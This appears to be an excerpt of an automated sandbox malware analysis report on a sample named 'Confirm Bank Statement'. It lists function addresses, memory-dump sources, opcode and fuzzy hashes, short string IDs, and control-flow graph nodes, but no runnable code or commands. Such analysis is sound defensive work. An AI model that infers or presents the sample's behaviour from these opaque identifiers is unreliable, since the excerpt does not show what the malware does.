                                                                                              • Opcode Fuzzy Hash: 331007174aee5f007bfd3df9dcbde03550046dab6ac044f80bf84ff617d0526a
                                                                                              • Instruction Fuzzy Hash: 0EE119B4E102598FDB14CFA9C680AAEFBB2FF89304F248169D414AB355D734AD41CF61
                                                                                              Function 0727F888 Relevance: .3, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e217cfd6c7f53723c9d5146e63038849ae807054c721b2a11871060721a47911
                                                                                              • Instruction ID: ec437ca3f1570ca2cd93dcc7f7fd54bfda698925bce767d1d82a60de7eb83410
                                                                                              • Opcode Fuzzy Hash: e217cfd6c7f53723c9d5146e63038849ae807054c721b2a11871060721a47911
                                                                                              • Instruction Fuzzy Hash: DDE12AB4E142598FDB14CFA8C690AAEFBB2FF89304F248169D815A7355D734AD42CF60
                                                                                              Function 0143E0CC Relevance: .3, Instructions: 264COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f7e1bdf8a583fa887a40ce507c7aa53b23d3e459ab2cad4383f8beabb6d9881
                                                                                              • Instruction ID: 0e095f51c5ceef334fbd404fc4632445e3658fd17b9543b0cb8637a580419d44
                                                                                              • Opcode Fuzzy Hash: 7f7e1bdf8a583fa887a40ce507c7aa53b23d3e459ab2cad4383f8beabb6d9881
                                                                                              • Instruction Fuzzy Hash: F4A14D32E0021A8FCF0ADFA5C8445DEBBB2BFD9300B15456AE905AB265DB71D91ACB40
                                                                                              Function 055B3C8A Relevance: 41.7, Strings: 33, Instructions: 438COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                              • API String ID: 0-78339950
                                                                                              • Opcode ID: 2b40178d712619fa4307cc7748362b21d74f0bec09210b84cdcf5bb8e912abc4
                                                                                              • Instruction ID: 4fe83a186b5404509e4fcf479e47cf86d8d6a77c8433fa44cfe563f38d3f9716
                                                                                              • Opcode Fuzzy Hash: 2b40178d712619fa4307cc7748362b21d74f0bec09210b84cdcf5bb8e912abc4
                                                                                              • Instruction Fuzzy Hash: 0E122970E0021E8FCB19EFB8F85069DB7B6FB94304F508569910AAF265DB306D59CB81
                                                                                              Function 055B3C98 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                                                              • API String ID: 0-78339950
                                                                                              • Opcode ID: f5a5bc6a1996a193688f59f57e6fa553afa56d27290b68f437ec365579702c5a
                                                                                              • Instruction ID: 4ed1b5210096683787f7b661595571a71cca1ec739135675da670f135684ab44
                                                                                              • Opcode Fuzzy Hash: f5a5bc6a1996a193688f59f57e6fa553afa56d27290b68f437ec365579702c5a
                                                                                              • Instruction Fuzzy Hash: 67122970E0021ECFCB19EFB8F85069DB7B6FB94304F508569910AAF265DB306D59CB81

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.4%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:20.8%
                                                                                              Total number of Nodes:48
                                                                                              Total number of Limit Nodes:4
                                                                                              execution_graph 18499 b5cab0 18500 b5cadd 18499->18500 18501 b5e9bf 18500->18501 18504 b5cde6 18500->18504 18505 b5c168 18500->18505 18503 b5c168 LdrInitializeThunk 18503->18504 18504->18501 18504->18503 18506 b5c17a 18505->18506 18508 b5c17f 18505->18508 18506->18504 18507 b5c8a9 LdrInitializeThunk 18507->18506 18508->18506 18508->18507 18509 b546d8 18510 b546e4 18509->18510 18513 b548c9 18510->18513 18511 b54713 18514 b548e4 18513->18514 18521 b54ef8 18514->18521 18527 b54f08 18514->18527 18515 b548f0 18533 28715ea 18515->18533 18539 28715f8 18515->18539 18516 b5491a 18516->18511 18522 b54f08 18521->18522 18523 b54ff6 18522->18523 18525 b5c168 LdrInitializeThunk 18522->18525 18545 b5c76c 18522->18545 18551 b5c158 18522->18551 18523->18515 18525->18523 18528 b54f2a 18527->18528 18529 b54ff6 18528->18529 18530 b5c76c 2 API calls 18528->18530 18531 b5c168 LdrInitializeThunk 18528->18531 18532 b5c158 2 API calls 18528->18532 18529->18515 18530->18529 18531->18529 18532->18529 18534 287161a 18533->18534 18535 287172c 18534->18535 18536 b5c76c 2 API calls 18534->18536 18537 b5c168 LdrInitializeThunk 18534->18537 18538 b5c158 2 API calls 18534->18538 18535->18516 18536->18535 18537->18535 18538->18535 18540 287161a 18539->18540 18541 287172c 18540->18541 18542 b5c76c 2 API calls 18540->18542 18543 b5c168 LdrInitializeThunk 18540->18543 18544 b5c158 2 API calls 18540->18544 18541->18516 18542->18541 18543->18541 18544->18541 18549 b5c623 18545->18549 18546 b5c764 LdrInitializeThunk 18548 b5c8c1 18546->18548 18548->18523 18549->18546 18550 b5c168 LdrInitializeThunk 18549->18550 18550->18549 18552 b5c17a 18551->18552 18556 b5c17f 18551->18556 18552->18523 18553 b5c764 LdrInitializeThunk 18553->18552 18555 b5c168 LdrInitializeThunk 18555->18556 18556->18552 18556->18553 18556->18555

                                                                                              Executed Functions

                                                                                              Function 02877770 Relevance: 12.2, Strings: 9, Instructions: 906COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                              • API String ID: 0-746337618
                                                                                              • Opcode ID: 655447af8acfdb1c72f93435f6357662c2ccfe0f6e83660b178298c723780328
                                                                                              • Instruction ID: 875167ac3012637efb4c841943b5aa813031d64f97dae20e2145020618f68220
                                                                                              • Opcode Fuzzy Hash: 655447af8acfdb1c72f93435f6357662c2ccfe0f6e83660b178298c723780328
                                                                                              • Instruction Fuzzy Hash: 84825D38A00609DFDB14CF68C984AAEBBF2FF88315F158559E849EB2A5D730ED41CB51
                                                                                              Function 02876A20 Relevance: 8.4, Strings: 6, Instructions: 904COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$,q$,q$Hq
                                                                                              • API String ID: 0-894188343
                                                                                              • Opcode ID: 56cf9b73c3cb7d5a6494451a900a9cd1ddaf7cebe2b8f7970641d06ccd612711
                                                                                              • Instruction ID: bbdffe406986607bc0a77dc8979ae2e64d556ce09a52da990f3167915ca051ad
                                                                                              • Opcode Fuzzy Hash: 56cf9b73c3cb7d5a6494451a900a9cd1ddaf7cebe2b8f7970641d06ccd612711
                                                                                              • Instruction Fuzzy Hash: D2726079A002199FDB14DF69C884AAEBBF6FF88304F148569E819DB365DB30ED41CB50
                                                                                              Function 02871C58 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2060 2871c58-2871c80 2061 2871c87-2871d2b 2060->2061 2062 2871c82 2060->2062 2066 2871d2d-2871d34 2061->2066 2067 2871d39-2871d8a 2061->2067 2062->2061 2068 2871f94-2871fb2 2066->2068 2075 2871e5c 2067->2075 2076 2871e65-2871e73 2075->2076 2077 2871d8f-2871dbc 2076->2077 2078 2871e79-2871e9e 2076->2078 2085 2871dbe-2871dc7 2077->2085 2086 2871ddd 2077->2086 2082 2871eb6 2078->2082 2083 2871ea0-2871eb5 2078->2083 2082->2068 2083->2082 2088 2871dce-2871dd1 2085->2088 2089 2871dc9-2871dcc 2085->2089 2090 2871de0-2871e01 2086->2090 2091 2871ddb 2088->2091 2089->2091 2094 2871e03-2871e59 2090->2094 2095 2871e5a-2871e5b 2090->2095 2091->2090 2094->2095 2095->2075
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq$PHq
                                                                                              • API String ID: 0-1274609152
                                                                                              • Opcode ID: 76c6ed7e2d0b9d70b941d372ef0a1152b99f65ae29213bd2ba303c4356cef9df
                                                                                              • Instruction ID: 036f361d56d1f625f309c56bc717b09a446e7cec61e9b5adec80f91557eb08a3
                                                                                              • Opcode Fuzzy Hash: 76c6ed7e2d0b9d70b941d372ef0a1152b99f65ae29213bd2ba303c4356cef9df
                                                                                              • Instruction Fuzzy Hash: 9B81B078E0021CCFDB58DFAAD99479DBBB2BF89304F20816AD419AB354DB349946CF50
                                                                                              Function 00B5C168 Relevance: 2.0, APIs: 1, Instructions: 528COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2278 b5c168-b5c178 2279 b5c17f-b5c18b 2278->2279 2280 b5c17a 2278->2280 2283 b5c192-b5c1a7 2279->2283 2284 b5c18d 2279->2284 2281 b5c2ab-b5c2b5 2280->2281 2287 b5c1ad-b5c1b8 2283->2287 2288 b5c2bb-b5c2fb call b55d08 2283->2288 2284->2281 2291 b5c2b6 2287->2291 2292 b5c1be-b5c1c5 2287->2292 2305 b5c302-b5c378 call b55d08 call b55c00 2288->2305 2291->2288 2293 b5c1c7-b5c1de 2292->2293 2294 b5c1f2-b5c1fd 2292->2294 2304 b5c1e4-b5c1e7 2293->2304 2293->2305 2299 b5c1ff-b5c207 2294->2299 2300 b5c20a-b5c214 2294->2300 2299->2300 2308 b5c29e-b5c2a3 2300->2308 2309 b5c21a-b5c224 2300->2309 2304->2291 2310 b5c1ed-b5c1f0 2304->2310 2339 b5c3df-b5c454 call b55ca8 2305->2339 2340 b5c37a-b5c3b7 2305->2340 2308->2281 2309->2291 2315 b5c22a-b5c246 2309->2315 2310->2293 2310->2294 2321 b5c248 2315->2321 2322 b5c24a-b5c24d 2315->2322 2321->2281 2324 b5c254-b5c257 2322->2324 2325 b5c24f-b5c252 2322->2325 2327 b5c25a-b5c268 2324->2327 2325->2327 2327->2291 2331 b5c26a-b5c271 2327->2331 2331->2281 2333 b5c273-b5c279 2331->2333 2333->2291 2334 b5c27b-b5c280 2333->2334 2334->2291 2336 b5c282-b5c295 2334->2336 2336->2291 2342 b5c297-b5c29a 2336->2342 2347 b5c4f3-b5c4f9 2339->2347 2343 b5c3be-b5c3dc 2340->2343 2344 b5c3b9 2340->2344 2342->2333 2346 b5c29c 2342->2346 2343->2339 2344->2343 2346->2281 2348 b5c4ff-b5c517 2347->2348 2349 b5c459-b5c46c 2347->2349 2350 b5c519-b5c526 2348->2350 2351 b5c52b-b5c53e 2348->2351 2352 b5c473-b5c4c4 2349->2352 2353 b5c46e 2349->2353 2354 b5c8c1-b5c9bf 2350->2354 2355 b5c545-b5c561 2351->2355 2356 b5c540 2351->2356 2371 b5c4d7-b5c4e9 2352->2371 2372 b5c4c6-b5c4d4 2352->2372 2353->2352 2361 b5c9c7-b5c9d1 2354->2361 2362 b5c9c1-b5c9c6 call b55ca8 2354->2362 2358 b5c563 2355->2358 2359 b5c568-b5c58c 2355->2359 2356->2355 2358->2359 2366 b5c593-b5c5c5 2359->2366 2367 b5c58e 2359->2367 2362->2361 2376 b5c5c7 2366->2376 2377 b5c5cc-b5c60e 2366->2377 2367->2366 2373 b5c4f0 2371->2373 2374 b5c4eb 2371->2374 2372->2348 2373->2347 2374->2373 2376->2377 2379 b5c615-b5c61e 2377->2379 2380 b5c610 2377->2380 2381 b5c846-b5c84c 2379->2381 2380->2379 2382 b5c623-b5c648 2381->2382 2383 b5c852-b5c865 2381->2383 2384 b5c64f-b5c686 2382->2384 2385 b5c64a 2382->2385 2386 b5c867 2383->2386 2387 b5c86c-b5c887 2383->2387 2395 b5c68d-b5c6bf 2384->2395 2396 b5c688 2384->2396 2385->2384 2386->2387 2388 b5c88e-b5c8a2 2387->2388 2389 b5c889 2387->2389 2393 b5c8a4 2388->2393 2394 b5c8a9-b5c8bf LdrInitializeThunk 2388->2394 2389->2388 2393->2394 2394->2354 2398 b5c6c1-b5c6e6 2395->2398 2399 b5c723-b5c736 2395->2399 2396->2395 2402 b5c6ed-b5c71b 2398->2402 2403 b5c6e8 2398->2403 2400 b5c73d-b5c762 2399->2400 2401 b5c738 2399->2401 2406 b5c764-b5c765 2400->2406 2407 b5c771-b5c7a9 2400->2407 2401->2400 2402->2399 2403->2402 2406->2383 2408 b5c7b0-b5c811 call b5c168 2407->2408 2409 b5c7ab 2407->2409 2415 b5c813 2408->2415 2416 b5c818-b5c83c 2408->2416 2409->2408 2415->2416 2419 b5c843 2416->2419 2420 b5c83e 2416->2420 2419->2381 2420->2419
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1d37f1eb358904a4a15e3bcebbbbf34ea9e961ca9312d1b4991786c97cc2518
                                                                                              • Instruction ID: 972e03e4897e1449328c53677a38dbe84c3064ea6f6dde66f1e2e45512713843
                                                                                              • Opcode Fuzzy Hash: f1d37f1eb358904a4a15e3bcebbbbf34ea9e961ca9312d1b4991786c97cc2518
                                                                                              • Instruction Fuzzy Hash: 4922F674E003188FDB14DFA9C884B9DBBF2BF88305F1481A9D849AB395DB759D86CB50
                                                                                              Function 02874500 Relevance: .7, Instructions: 745COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4be3d40b634321a8cf569162ebae334678412cf11c45ed898e78beb518fe52b
                                                                                              • Instruction ID: 63785a643037678e65ebbc5ba2cf7ec588c69d0ffbaad724010d2988f350b245
                                                                                              • Opcode Fuzzy Hash: b4be3d40b634321a8cf569162ebae334678412cf11c45ed898e78beb518fe52b
                                                                                              • Instruction Fuzzy Hash: F9827E74E012289FDBA5DF69CD94BDDBBB2BB89300F1481EA940DA7261DB315E81CF41
                                                                                              Function 028715F8 Relevance: .3, Instructions: 296COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 12a67b04a91f44b8a084ec4432a25d83647414923fb06f1dbb327d0e86bf8707
                                                                                              • Instruction ID: 1cf5e7f650e86981a0cf8e3637a2b1024c9bef6bf1145111c26422533a274cb2
                                                                                              • Opcode Fuzzy Hash: 12a67b04a91f44b8a084ec4432a25d83647414923fb06f1dbb327d0e86bf8707
                                                                                              • Instruction Fuzzy Hash: 29E1C374E01218DFEB24DFA9C944B9DBBF2BF49304F1081A9D809AB395DB359A85CF10
                                                                                              Function 0287AF78 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7418078b7203d4802c98d7b2e6fe3561324160ef21ff0cb231ccbe54ff4a16b
                                                                                              • Instruction ID: 7fc14034fac69d909a197d972f282d97bb8a74bbaa4ca7f633896840a264c08b
                                                                                              • Opcode Fuzzy Hash: f7418078b7203d4802c98d7b2e6fe3561324160ef21ff0cb231ccbe54ff4a16b
                                                                                              • Instruction Fuzzy Hash: 8CC1C378E01218CFDB14DFA9C945B9DBBB2BF89304F2081A9D809AB355DB359E85CF10
                                                                                              Function 00B54F08 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ed3cf7c774fd255139c11224f391e16da0d5ce2fee0696a86e4c85ea0cbd26a
                                                                                              • Instruction ID: d96ab3675f97a6372bd164c431566fe28e2ad7ff9616e1ea079178b508cdc495
                                                                                              • Opcode Fuzzy Hash: 8ed3cf7c774fd255139c11224f391e16da0d5ce2fee0696a86e4c85ea0cbd26a
                                                                                              • Instruction Fuzzy Hash: 0FC19074E01218DFDB14DFA9D954B9DBBB2BF88301F2081A9D809AB354DB359E85CF50
                                                                                              Function 00B55358 Relevance: .2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 45b678d3353476a3571cb28f9b8ec78fde533cdb3d6ff62bd703fa9b412696f2
                                                                                              • Instruction ID: 64e4c82fab28e0664eecd36d209ef48128b024046b6ebe5d1d939d66c911d692
                                                                                              • Opcode Fuzzy Hash: 45b678d3353476a3571cb28f9b8ec78fde533cdb3d6ff62bd703fa9b412696f2
                                                                                              • Instruction Fuzzy Hash: 87A10470D006088FEB24DFA8D958B9DBBB1FF89301F2482A9D409A73A1DB709985CF55
                                                                                              Function 00B556AF Relevance: .2, Instructions: 202COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0133c66375f6c0fb6e44d4f556ffdf6ddaee22a4e8905d2dbe33ad706579b498
                                                                                              • Instruction ID: b58b7cf80689d66ede79d282a92aaf92131fe06915ecca730f35f47c747b0bf4
                                                                                              • Opcode Fuzzy Hash: 0133c66375f6c0fb6e44d4f556ffdf6ddaee22a4e8905d2dbe33ad706579b498
                                                                                              • Instruction Fuzzy Hash: 6791E474900608CFDB20DFA8D998B9CBBF1FF49302F248299E409A73A1DB759985CF55
                                                                                              Function 028715EA Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bfe04f654f61b04b5bcbef7f3e06037a0038f5bfb164c13242fc310b05e72471
                                                                                              • Instruction ID: a46954ca1eeffa9d6726ff030d43178eaee6f684fa147f2cf502055770dbcf06
                                                                                              • Opcode Fuzzy Hash: bfe04f654f61b04b5bcbef7f3e06037a0038f5bfb164c13242fc310b05e72471
                                                                                              • Instruction Fuzzy Hash: 9F41C2B5D012088BEB18DFAAC95479DFBF2BF88304F14C0AAD418BB294DB354946CF54
                                                                                              Function 0287AF73 Relevance: .1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 056cfb991e2f7938db485911b5e809c1dc325fe2ab28ed01c7fcb28599b7ff7b
                                                                                              • Instruction ID: 3e8058e185ffdb8f98cb52a675c9e7e439d31b708ead3438e3711dbea7affacc
                                                                                              • Opcode Fuzzy Hash: 056cfb991e2f7938db485911b5e809c1dc325fe2ab28ed01c7fcb28599b7ff7b
                                                                                              • Instruction Fuzzy Hash: 8941D275D01208CBEB18DFAAC55069DBBF2AF89304F24C16AD418BB259DB344946CF54
                                                                                              Function 028765FF Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1918 28765ff-287660d 1919 2876615-2876617 1918->1919 1920 287660f-2876613 1918->1920 1922 2876828-287682f 1919->1922 1920->1919 1921 287661c-2876627 1920->1921 1923 2876830 1921->1923 1924 287662d-2876634 1921->1924 1929 2876835-287686d 1923->1929 1925 287663a-2876649 1924->1925 1926 28767c9-28767cf 1924->1926 1925->1929 1930 287664f-287665e 1925->1930 1927 28767d5-28767d9 1926->1927 1928 28767d1-28767d3 1926->1928 1931 2876826 1927->1931 1932 28767db-28767e1 1927->1932 1928->1922 1948 2876876-287687a 1929->1948 1949 287686f-2876874 1929->1949 1936 2876673-2876676 1930->1936 1937 2876660-2876663 1930->1937 1931->1922 1932->1923 1934 28767e3-28767e6 1932->1934 1934->1923 1938 28767e8-28767fd 1934->1938 1940 2876682-2876688 1936->1940 1941 2876678-287667b 1936->1941 1939 2876665-2876668 1937->1939 1937->1940 1955 2876821-2876824 1938->1955 1956 28767ff-2876805 1938->1956 1943 287666e 1939->1943 1944 2876769-287676f 1939->1944 1950 28766a0-28766bd 1940->1950 1951 287668a-2876690 1940->1951 1945 28766ce-28766d4 1941->1945 1946 287667d 1941->1946 1952 2876794-28767a1 1943->1952 1960 2876787-2876791 1944->1960 1961 2876771-2876777 1944->1961 1953 28766d6-28766dc 1945->1953 1954 28766ec-28766fe 1945->1954 1946->1952 1957 2876880-2876882 1948->1957 1949->1957 1988 28766c6-28766c9 1950->1988 1958 2876694-287669e 1951->1958 1959 2876692 1951->1959 1979 28767b5-28767b7 1952->1979 1980 28767a3-28767a7 1952->1980 1962 28766e0-28766ea 1953->1962 1963 28766de 1953->1963 1983 2876700-287670c 1954->1983 1984 287670e-2876731 1954->1984 1955->1922 1964 2876817-287681a 1956->1964 1965 2876807-2876815 1956->1965 1966 2876897-287689e 1957->1966 1967 2876884-2876896 1957->1967 1958->1950 1959->1950 1960->1952 1968 287677b-2876785 1961->1968 1969 2876779 1961->1969 1962->1954 1963->1954 1964->1923 1971 287681c-287681f 1964->1971 1965->1923 1965->1964 1968->1960 1969->1960 1971->1955 1971->1956 1986 28767bb-28767be 1979->1986 1980->1979 1985 28767a9-28767ad 1980->1985 1992 2876759-2876767 1983->1992 1984->1923 1994 2876737-287673a 1984->1994 1985->1923 1989 28767b3 1985->1989 1986->1923 1990 28767c0-28767c3 1986->1990 1988->1952 1989->1986 1990->1925 1990->1926 1992->1952 1994->1923 1996 2876740-2876752 1994->1996 1996->1992
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,q$,q
                                                                                              • API String ID: 0-1667412543
                                                                                              • Opcode ID: 41900760fe29be126044c88c95afb2bd6abc335b8a10b6cc594548d9fdff093c
                                                                                              • Instruction ID: 06be4ae0f493e173bf9178580086c1d89ca1fb20ee5633c6cb40bd9ce93fc418
                                                                                              • Opcode Fuzzy Hash: 41900760fe29be126044c88c95afb2bd6abc335b8a10b6cc594548d9fdff093c
                                                                                              • Instruction Fuzzy Hash: A381A33CA00925CFCB14CF69C484A6EB7BABF89358B548169D41AD7365EB31EC41CF91
                                                                                              Function 02872508 Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1998 2872508-2872527 1999 28726e2-2872707 1998->1999 2000 287252d-2872536 1998->2000 2004 287270e-28727a8 call 2872270 1999->2004 2000->2004 2005 287253c-2872591 2000->2005 2048 28727ad-28727b2 2004->2048 2013 2872593-28725b8 2005->2013 2014 28725bb-28725c4 2005->2014 2013->2014 2016 28725c6 2014->2016 2017 28725c9-28725d9 2014->2017 2016->2017 2056 28725db call 28726ea 2017->2056 2057 28725db call 28724f8 2017->2057 2058 28725db call 2872508 2017->2058 2059 28725db call 2872808 2017->2059 2020 28725e1-28725e3 2021 28725e5-28725ea 2020->2021 2022 287263d-287268a 2020->2022 2024 2872623-2872636 2021->2024 2025 28725ec-2872621 2021->2025 2035 2872691-2872696 2022->2035 2024->2022 2025->2035 2038 28726a0-28726a5 2035->2038 2039 2872698 2035->2039 2041 28726a7 2038->2041 2042 28726af-28726b4 2038->2042 2039->2038 2041->2042 2045 28726b6-28726c4 call 28720e4 call 28720fc 2042->2045 2046 28726c9-28726ca 2042->2046 2045->2046 2046->1999 2056->2020 2057->2020 2058->2020 2059->2020
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (&q$(q
                                                                                              • API String ID: 0-2464455664
                                                                                              • Opcode ID: 38b3c95148da316acf1deda2089b6120b7c1a23f7415190ddf7198cd38090c16
                                                                                              • Instruction ID: 6225c028a95913beab1705a6a7b07b772277e38858a8aee895123846e9b630ee
                                                                                              • Opcode Fuzzy Hash: 38b3c95148da316acf1deda2089b6120b7c1a23f7415190ddf7198cd38090c16
